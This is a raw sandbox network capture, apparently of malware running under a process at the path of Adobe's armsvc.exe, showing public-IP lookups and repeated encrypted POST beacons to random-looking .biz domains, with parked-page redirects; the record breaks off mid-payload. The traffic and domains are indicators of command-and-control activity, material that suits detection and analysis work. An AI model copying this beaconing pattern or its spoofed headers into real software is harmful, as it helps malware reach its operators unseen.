                                                                                                                                                                              Dec 11, 2024 09:26:14.903294086 CET321INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:14 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Request-ID: 84d48e61fb278cbdc904ffe996f14bfd
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>
                                                                                                                                                                              Dec 11, 2024 09:26:21.864192009 CET127OUTGET / HTTP/1.1
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                              Host: checkip.dyndns.org
                                                                                                                                                                              Dec 11, 2024 09:26:22.270047903 CET321INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:22 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 104
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Request-ID: 1c313a9678119b57abce91e3559a0265
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.175</body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              6192.168.2.54971044.221.84.105801972C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:26:14.238643885 CET353OUTPOST /gjuvotllw HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: npukfztj.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 850
                                                                                                                                                                              Dec 11, 2024 09:26:14.238643885 CET850OUTData Raw: c5 d9 70 a4 cf ee e1 8a 46 03 00 00 b1 bd 72 94 29 79 b4 4d ee ef f7 93 52 90 ea 4d ea 9e 2f da 5c f0 41 45 c5 58 b5 87 df d2 e1 df 35 4e 38 5f 8a a9 07 36 60 88 e0 b8 63 ce 84 37 d6 e9 2a 3d cd 60 12 66 65 9e 13 22 29 41 46 0c 46 97 c5 50 fb 33
                                                                                                                                                                              Data Ascii: pFr)yMRM/\AEX5N8_6`c7*=`fe")AFFP3Y"E6e7In8_[s^H,bf_FiqD7aPZQ}c}nE0w$'1 %O:3SeX+'>s~$xsr)],|c
                                                                                                                                                                              Dec 11, 2024 09:26:15.337960005 CET412INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:15 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: btst=b3206ca6d5587b87fa637a002e02ea2c|8.46.123.175|1733905575|1733905575|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                              Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              7192.168.2.549712172.234.222.138801972C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:26:16.042012930 CET348OUTPOST /iwsxa HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: przvgke.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 850
                                                                                                                                                                              Dec 11, 2024 09:26:16.042012930 CET850OUTData Raw: 2e d1 a4 a7 18 8b 53 46 46 03 00 00 89 f4 37 b3 7d 0a fc 98 68 dc d5 a9 4e 38 71 f8 fd b2 7e 49 c6 67 dd dc 04 e2 16 b5 e1 92 a5 37 ad 04 e8 24 c8 b7 b8 e3 63 be 1b 71 af 9b 59 d9 7e bd 15 50 e2 44 b9 5f 30 b6 c4 e5 ec 91 3b 7d 15 76 1c 99 18 20
                                                                                                                                                                              Data Ascii: .SFF7}hN8q~Ig7$cqY~PD_0;}v AxWC1\^jO+&8H*e-:|(==)1M'OO> V!gYW^CiACNWqO`^M@PMo0@{Y#?z`O.hr
                                                                                                                                                                              Dec 11, 2024 09:26:17.188370943 CET467INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                              Server: openresty
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:17 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 142
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                              Location: http://ww99.przvgke.biz/iwsxa
                                                                                                                                                                              Cache-Control: no-store, max-age=0
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                              Dec 11, 2024 09:26:22.781728983 CET357OUTPOST /snsobwmcccpnrm HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: przvgke.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 850
                                                                                                                                                                              Dec 11, 2024 09:26:22.781763077 CET850OUTData Raw: ad 88 d4 44 2a 4b 20 e4 46 03 00 00 02 f0 e4 a2 ce 8a 88 05 65 33 3d 3b e4 5d c6 6c 56 9a d8 5e c1 bc d6 a2 eb e8 a2 ec 73 9d 3f c0 c6 f2 79 c7 11 e3 7f 6c d8 82 c1 2c 5a a3 c0 96 31 bf cd 75 64 fa 3d 66 df 1e 76 b5 57 e1 e5 57 07 68 50 5e 61 04
                                                                                                                                                                              Data Ascii: D*K Fe3=;]lV^s?yl,Z1ud=fvWWhP^a@t`f7>\gy=CV<#\ryry_,S@s!D?>*+;al*KHe)]rlIF8C_">U,hadm$a{^yr,G-I
                                                                                                                                                                              Dec 11, 2024 09:26:23.120907068 CET476INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                              Server: openresty
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:22 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 142
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                              Location: http://ww99.przvgke.biz/snsobwmcccpnrm
                                                                                                                                                                              Cache-Control: no-store, max-age=0
                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              8192.168.2.54971372.52.179.174801972C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:26:17.465089083 CET331OUTGET /iwsxa HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Host: ww99.przvgke.biz
                                                                                                                                                                              Dec 11, 2024 09:26:20.718612909 CET279INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:20 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Location: http://ww12.przvgke.biz/iwsxa?usid=25&utid=8132645662
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Dec 11, 2024 09:26:23.381673098 CET340OUTGET /snsobwmcccpnrm HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Host: ww99.przvgke.biz
                                                                                                                                                                              Dec 11, 2024 09:26:24.547502995 CET288INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:24 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              Location: http://ww12.przvgke.biz/snsobwmcccpnrm?usid=25&utid=8132647334
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Access-Control-Allow-Origin: *


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              9192.168.2.54971513.248.148.254801972C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:26:21.250545979 CET355OUTGET /iwsxa?usid=25&utid=8132645662 HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Host: ww12.przvgke.biz
                                                                                                                                                                              Dec 11, 2024 09:26:22.554306030 CET825INHTTP/1.1 200 OK
                                                                                                                                                                              Accept-Ch: viewport-width
                                                                                                                                                                              Accept-Ch: dpr
                                                                                                                                                                              Accept-Ch: device-memory
                                                                                                                                                                              Accept-Ch: rtt
                                                                                                                                                                              Accept-Ch: downlink
                                                                                                                                                                              Accept-Ch: ect
                                                                                                                                                                              Accept-Ch: ua
                                                                                                                                                                              Accept-Ch: ua-full-version
                                                                                                                                                                              Accept-Ch: ua-platform
                                                                                                                                                                              Accept-Ch: ua-platform-version
                                                                                                                                                                              Accept-Ch: ua-arch
                                                                                                                                                                              Accept-Ch: ua-model
                                                                                                                                                                              Accept-Ch: ua-mobile
                                                                                                                                                                              Accept-Ch-Lifetime: 30
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:22 GMT
                                                                                                                                                                              Server: Caddy
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_Zt2r4BpQytAyzx39iK0B0lSzV0rD/Wm45LSqczltRWvwOYaESImcebYTCqqsfhakfUINr+vqhPecDey3RZ1c/A==
                                                                                                                                                                              X-Domain: przvgke.biz
                                                                                                                                                                              X-Pcrew-Blocked-Reason:
                                                                                                                                                                              X-Pcrew-Ip-Organization: CenturyLink
                                                                                                                                                                              X-Subdomain: ww12
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Dec 11, 2024 09:26:22.554636955 CET1236INData Raw: 33 63 66 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44
                                                                                                                                                                              Data Ascii: 3cff<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_Zt2r4BpQytAyzx39iK0B0lSzV0rD/Wm45LSqczltRWvwOYaESImcebYTCqqsfhakfUINr
                                                                                                                                                                              Dec 11, 2024 09:26:22.554822922 CET224INData Raw: 67 69 6e 3a 30 20 30 20 33 70 78 20 32 30 70 78 3b 0a 7d 0a 0a 2e 73 69 74 65 6c 69 6e 6b 48 6f 6c 64 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 2d 31 35 70 78 20 30 20 31 35 70 78 20 33 35 70 78 3b 0a 7d 0a 0a 23 61 6a 61 78 6c 6f 61 64 65 72 48 6f
                                                                                                                                                                              Data Ascii: gin:0 0 3px 20px;}.sitelinkHolder {margin:-15px 0 15px 35px;}#ajaxloaderHolder {display: block;width: 24px;height: 24px;background: #fff;padding: 8px 0 0 8px;margin:10px auto;-webkit-border-radius: 4px;
                                                                                                                                                                              Dec 11, 2024 09:26:22.554830074 CET1236INData Raw: 0a 09 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 7d 3c 2f 73 74 79 6c 65 3e 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22
                                                                                                                                                                              Data Ascii: -moz-border-radius: 4px;border-radius: 4px;}</style> <style media="screen">* { margin:0;padding:0}body { background:#101c36; font-family: sans-serif; text-align: center; font-size:1rem;}.header { padding:
                                                                                                                                                                              Dec 11, 2024 09:26:22.554857016 CET1236INData Raw: 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 36 32 36 35 37 34 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 73 65 61 72 63 68 48 6f 6c 64 65 72 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 70 78 20 30 20 31 70 78 20 31 70 78 3b 0a 20 20 20 20 6d
                                                                                                                                                                              Data Ascii: color:#626574 !important;}.searchHolder { padding:1px 0 1px 1px; margin:1rem auto; width: 95%; max-width: 500px;}@media screen and (min-width:600px) { .comp-is-parked, .comp-sponsored { color: #848484;
                                                                                                                                                                              Dec 11, 2024 09:26:22.554863930 CET1236INData Raw: 20 20 20 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 27 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 6d 61 57 78 73
                                                                                                                                                                              Data Ascii: height: 24px; background-image: url('data:image/svg+xml;base64,PHN2ZyBmaWxsPScjRDdEN0Q3JyBzdHlsZT0iZmxvYXQ6IHJpZ2h0IiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgd2lkdGg9IjI0Ij48cGF0aCBkPSJNM
                                                                                                                                                                              Dec 11, 2024 09:26:22.555110931 CET1236INData Raw: 2f 70 72 69 76 61 63 79 2e 68 74 6d 6c 27 2c 20 27 70 72 69 76 61 63 79 2d 70 6f 6c 69 63 79 27 2c 20 27 77 69 64 74 68 3d 38 39 30 2c 68 65 69 67 68 74 3d 33 33 30 2c 6c 65 66 74 3d 32 30 30 2c 74 6f 70 3d 32 30 30 2c 6d 65 6e 75 62 61 72 3d 6e
                                                                                                                                                                              Data Ascii: /privacy.html', 'privacy-policy', 'width=890,height=330,left=200,top=200,menubar=no,status=yes,toolbar=no').focus()" class="privacy-policy"> Privacy Policy</a><br/><br/><br/><br/> </div></div><script type="text/javascript" langua
                                                                                                                                                                              Dec 11, 2024 09:26:22.555118084 CET1236INData Raw: 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 6c 65 74 20 69 73 41 64 75 6c 74 3d 66 61 6c 73 65 3b 20 20 20 20 20 20 20 20 20 6c 65 74 20 63 6f 6e 74 61 69 6e 65 72 4e 61 6d 65 73 3d 5b 5d 3b 20
                                                                                                                                                                              Data Ascii: <script type="text/javascript">let isAdult=false; let containerNames=[]; let uniqueTrackingID='MTczMzkwNTU4Mi4yNjE6YzUxYmE5OWQ3MmE4YjE1MjBiNWZlNTdkMzQyZGI3NjNmYzE4OTdjYmY5MjgwMDM3Mzk3N2QxZTUxMWFlZTcxOTo2NzU5NGNhZTNmYjU4';
                                                                                                                                                                              Dec 11, 2024 09:26:22.555124998 CET1236INData Raw: 74 20 2b 20 27 2f 3f 74 73 3d 27 2c 27 66 6f 6e 74 46 61 6d 69 6c 79 27 3a 20 27 61 72 69 61 6c 27 2c 27 6f 70 74 69 6d 69 7a 65 54 65 72 6d 73 27 3a 20 74 72 75 65 2c 27 6d 61 78 54 65 72 6d 4c 65 6e 67 74 68 27 3a 20 34 30 2c 27 61 64 74 65 73
                                                                                                                                                                              Data Ascii: t + '/?ts=','fontFamily': 'arial','optimizeTerms': true,'maxTermLength': 40,'adtest': true,'clicktrackUrl': '//' + location.host + '/track.php?','attributionText': 'Ads','colorAttribution': '#b7b7b7','fontSizeAttribution': 16,'attributionBold'
                                                                                                                                                                              Dec 11, 2024 09:26:22.555130959 CET1236INData Raw: 70 6f 6e 65 6e 74 28 75 6e 69 71 75 65 54 72 61 63 6b 69 6e 67 49 44 29 29 3b 7d 69 66 20 28 73 74 61 74 75 73 2e 65 72 72 6f 72 63 6f 64 65 20 26 26 20 21 73 74 61 74 75 73 2e 65 72 72 6f 72 5f 63 6f 64 65 29 20 7b 73 74 61 74 75 73 2e 65 72 72
                                                                                                                                                                              Data Ascii: ponent(uniqueTrackingID));}if (status.errorcode && !status.error_code) {status.error_code = status.errorcode;}if (status.error_code) {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=errorcode&code=" +
                                                                                                                                                                              Dec 11, 2024 09:26:22.675265074 CET1236INData Raw: 74 26 75 69 64 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 75 6e 69 71 75 65 54 72 61 63 6b 69 6e 67 49 44 29 29 3b 7d 20 65 6c 73 65 20 69 66 20 28 28 73 74 61 74 75 73 2e 61 64 75 6c 74 20 3d 3d 3d 20 66 61 6c 73 65
                                                                                                                                                                              Data Ascii: t&uid=" + encodeURIComponent(uniqueTrackingID));} else if ((status.adult === false || status.adult == "false") && isAdult) {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=nonadult&uid=" + encodeURICom
                                                                                                                                                                              Dec 11, 2024 09:26:24.551563978 CET364OUTGET /snsobwmcccpnrm?usid=25&utid=8132647334 HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Host: ww12.przvgke.biz
                                                                                                                                                                              Dec 11, 2024 09:26:25.057082891 CET825INHTTP/1.1 200 OK
                                                                                                                                                                              Accept-Ch: viewport-width
                                                                                                                                                                              Accept-Ch: dpr
                                                                                                                                                                              Accept-Ch: device-memory
                                                                                                                                                                              Accept-Ch: rtt
                                                                                                                                                                              Accept-Ch: downlink
                                                                                                                                                                              Accept-Ch: ect
                                                                                                                                                                              Accept-Ch: ua
                                                                                                                                                                              Accept-Ch: ua-full-version
                                                                                                                                                                              Accept-Ch: ua-platform
                                                                                                                                                                              Accept-Ch: ua-platform-version
                                                                                                                                                                              Accept-Ch: ua-arch
                                                                                                                                                                              Accept-Ch: ua-model
                                                                                                                                                                              Accept-Ch: ua-mobile
                                                                                                                                                                              Accept-Ch-Lifetime: 30
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:24 GMT
                                                                                                                                                                              Server: Caddy
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_X+G6jDd1B8cElmIQlB675pfVulnMmKTHwlcR8HKLhayYnFRPpJnTgx1YqQj7SwujdpZmxbcj7U0WhOh+0Ep8eA==
                                                                                                                                                                              X-Domain: przvgke.biz
                                                                                                                                                                              X-Pcrew-Blocked-Reason:
                                                                                                                                                                              X-Pcrew-Ip-Organization: CenturyLink
                                                                                                                                                                              X-Subdomain: ww12
                                                                                                                                                                              Transfer-Encoding: chunked


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              10192.168.2.54973118.141.10.107801972C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:26:26.524910927 CET356OUTPOST /feiwbqpqckjc HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: knjghuig.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 850
                                                                                                                                                                              Dec 11, 2024 09:26:26.524929047 CET850OUTData Raw: 51 f6 89 f6 32 2a ac 98 46 03 00 00 c9 a2 b6 92 54 13 a8 f8 a7 e9 22 07 97 83 50 dd 4a 12 fc 67 37 83 fd f9 6d c2 73 00 ea 1f 6e f2 c5 3c d2 17 11 d7 67 84 a5 b7 43 38 c1 89 63 f3 79 42 47 2c 1d ec c5 aa 98 85 89 87 28 4d 40 05 dd 25 9d 22 7c b9
                                                                                                                                                                              Data Ascii: Q2*FT"PJg7msn<gC8cyBG,(M@%"|RM]!ob8~g]I)O0Ky9%ImjB@e$leY-b M/%\/J|Mq2FLUL^]PG;M]z12VxM|;#f
                                                                                                                                                                              Dec 11, 2024 09:26:28.610888004 CET412INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 11 Dec 2024 08:26:28 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: btst=269b08293699a577a072ffff352ce405|8.46.123.175|1733905588|1733905588|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                              Set-Cookie: snkz=8.46.123.175; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              11192.168.2.54974282.112.184.197801972C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Dec 11, 2024 09:26:30.448394060 CET348OUTPOST /dtxqcr HTTP/1.1
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Host: lpuegx.biz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                              Content-Length: 850
                                                                                                                                                                              Dec 11, 2024 09:26:30.448440075 CET850OUTData Raw: d1 d1 4a a6 ac fb de f3 46 03 00 00 e1 16 3f 45 c5 c8 27 f5 d2 5b 1f 84 73 36 dc ad 3b e4 3f 68 5f 88 ee 7b bd 06 f6 44 bd b4 71 41 f6 17 bb 11 11 a9 6a 30 66 ee c6 09 af 51 ee 51 e3 b6 fa c3 37 f5 b2 50 1d c4 1d 71 fc c0 fc ce ff 4e b9 8f 84 50
